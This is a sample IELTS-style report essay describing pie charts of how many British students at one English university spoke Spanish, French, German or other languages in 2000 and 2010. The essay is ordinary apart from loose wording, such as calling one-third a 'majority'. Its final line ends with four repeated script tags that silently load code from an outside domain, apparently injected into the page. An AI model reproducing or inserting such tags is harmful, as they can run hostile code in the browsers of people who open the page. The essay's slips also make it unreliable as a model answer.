The charts below show the proportions of British students at one university in England who were able to speak other languages in addition to English in 2000 and 2010.
The pie chart delineated the percentage of British students who were bilingual or multilingual in two years – 2000 and 2010. The students were studied at a university in England. As time passed, more students were able to communicate in different languages other than English. Besides English, the languages discussed were French, German, Spanish, another language, two other languages.
The majority of students were bilingual, accounting for one-third of the total number of surveyed students. In 2000, 30% of students spoke Spanish besides English. The figure kept the first position for both years, with an upsurge of 5% in 2010. Conversely, the proportion of students who had knowledge in both English and French decreased slightly, from 15% to 10% during the 10-year period. Only the proportion of German and English bilinguals remained steady at the same time.
However, there was a small proportion of the students who were unable to use another language. Those took up 20% and 10% in 2000 and 2010 respectively. Obviously, that decreased, leading to an increase in the percentage of students who knew other languages in addition to English. The number of students communicating in another language or two other languages varied by roughly 5%. Although the proportion of the two figures increased in 2010, the gap between the two was identical.
In sum, most students were bilinguals. The percentage of students who only spoke English dropped as a direct consequence of more students learned second or third languages.<script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script>
